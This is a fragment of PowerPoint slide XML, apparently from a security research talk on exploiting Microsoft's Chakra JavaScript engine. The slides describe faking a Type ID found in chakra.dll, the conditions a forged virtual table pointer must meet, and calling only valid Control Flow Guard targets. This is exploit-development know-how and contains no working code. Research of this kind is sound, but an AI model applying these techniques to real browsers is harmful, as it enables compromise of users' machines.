                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A2A9A30-F95A-4518-8583-13A13D8DEB61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="16" idx="1"/>
            <a:endCxn id="17" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1078125" y="4156930"/>
            <a:ext cx="1408700" cy="4183127"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 116228"/>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18" name="图片 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D4F63B5-8FA8-43B2-A50D-331FF82EA9BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7548036" y="7109652"/>
            <a:ext cx="4483544" cy="1517866"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D45D47EB-0A92-4E58-B8FA-3D6B9F22D692}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7548037" y="4418494"/>
            <a:ext cx="4483544" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jump to loc_18011464c, the condition is not met</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="连接符: 肘形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{583B2843-0136-41B4-88FD-F9A06C2A99DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="17" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="3808201" y="4312762"/>
            <a:ext cx="3023398" cy="4456274"/>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21" name="文本框 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{886868F3-DF40-4FA7-B7B1-3B3AAC4C9D3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7714496" y="6261737"/>
            <a:ext cx="4205208" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>After the function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GetScriptType</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> returns</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="矩形 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A2CFC53-F0FA-470F-ADD8-1751791AED0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7667147" y="7436176"/>
            <a:ext cx="2124553" cy="38702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EAC8682A-0C03-4809-B26C-D33F7144589D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7692547" y="8223576"/>
            <a:ext cx="2124553" cy="38702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4" name="文本框 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DB68B97-38A0-43C4-9E9D-F2446B7A8DB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7506479" y="8822055"/>
            <a:ext cx="4525102" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If the return value is negative and rsp+150h+var_110 is not equal to 5, then jump to loc_180d9ae99, the condition is not met.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="950645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14" name="文本框 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F49CBC8-709A-4FAF-8E4C-C1B5E15605DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1064753" y="2347085"/>
            <a:ext cx="8230975" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>After searching, we found a fake Type ID in chakra.dll that meets the above conditions.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="SimHei" charset="-122"/>
              <a:ea typeface="SimHei" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="图片 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BFDF628-67A5-4C1C-A253-1FC1014510ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7447454" y="4480828"/>
            <a:ext cx="4597498" cy="4873979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="图片 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E68EECA7-3C5E-42CA-A72E-F0AE27677FAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078127" y="3110800"/>
            <a:ext cx="6329210" cy="1778700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="图片 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8538621-FDC7-4139-BEA0-4A482E963A1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7407337" y="3128392"/>
            <a:ext cx="4354154" cy="956957"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="矩形 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAC079B6-867D-40DB-B154-C7FA304A1402}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="9473412" y="3355440"/>
            <a:ext cx="1435888" cy="2453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E3A1796B-9FCB-4639-8102-A29CC90327A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8406612" y="4885726"/>
            <a:ext cx="1867688" cy="245333"/>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5" name="连接符: 肘形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC6BF478-C3E1-4AA0-AB42-93B2D0704607}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="28" idx="0"/>
            <a:endCxn id="29" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9123430" y="3817799"/>
            <a:ext cx="1284953" cy="850900"/>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0" name="矩形 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D3B5E47-07A4-4C01-ABA6-C38C3DA9CFDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8406612" y="8533800"/>
            <a:ext cx="3556788" cy="82100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12" name="连接符: 肘形 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A288772-E6F6-48BB-AD6D-CE14CB6AEC44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="29" idx="3"/>
            <a:endCxn id="30" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10185006" y="5008392"/>
            <a:ext cx="89294" cy="3525408"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -256008"/>
              <a:gd name="adj2" fmla="val 5174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31" name="图片 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62161A14-40DB-44A2-8058-1F73903B4601}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1100937" y="5376862"/>
            <a:ext cx="3372642" cy="835832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="矩形 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82FA7E23-809E-4828-8774-A22B014B16AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1234287" y="5399880"/>
            <a:ext cx="3118638" cy="31511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33" name="连接符: 肘形 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FD37978-8930-4889-A042-AD3DEEF22AB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="32" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4352926" y="5557439"/>
            <a:ext cx="4053691" cy="3386536"/>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5" name="文本框 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{622B8413-E05D-4F4F-9C2B-665599B00073}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1064753" y="6920089"/>
            <a:ext cx="4955047" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The 4-byte Type ID value at 7ffd830aee44 satisfies the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GetScritpType</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> requirement, the return value is greater than or equal to 0, and [rsp+150h+var_110] is equal to 5</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18727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21" name="文本框 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{092F9F4E-729B-40A1-9871-BE9874A8097F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045235" y="2514058"/>
            <a:ext cx="11304748" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>The requirement for a virtual table pointer is</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="SimHei" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="图片 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59EB3BA0-649E-4671-A90B-1A5253857DAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1052721" y="2996695"/>
            <a:ext cx="6497170" cy="912102"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="矩形 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{346811FF-4646-4F9A-B5B2-C0483E103776}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3962867" y="3301160"/>
            <a:ext cx="2902754" cy="145432"/>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24" name="连接符: 肘形 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72AA8868-BC5B-4FBE-BC78-5628B003ADAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="23" idx="3"/>
            <a:endCxn id="34" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6865621" y="3057696"/>
            <a:ext cx="3513134" cy="316180"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 17274"/>
              <a:gd name="adj2" fmla="val 17230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文本框 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DAB2EFF-CBE6-4034-84B0-0BCBFFAA2256}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8079362" y="3057696"/>
            <a:ext cx="4598786" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" defTabSz="914400">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The virtual function call must be a valid CFG destination address.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36" name="图片 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A09C04F-6A69-45E0-AB25-6C0C7806B7FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1091703" y="4340372"/>
            <a:ext cx="3117609" cy="1450680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="文本框 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2927822B-C332-40BD-91C8-EFAE8F550784}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045235" y="3882815"/>
            <a:ext cx="5058415" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UnpackDictionary</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="文本框 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EF86832-8AE0-4C10-BBE2-AF66DE64CFBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1091703" y="8183444"/>
            <a:ext cx="7467398" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Js::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavascriptOperators</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OP_GetProperty</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="40" name="连接符: 肘形 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97797E67-69E7-49B0-9072-05B54F2F1114}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="49" idx="1"/>
            <a:endCxn id="37" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1045235" y="3804698"/>
            <a:ext cx="2917632" cy="308949"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 107835"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="42" name="图片 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
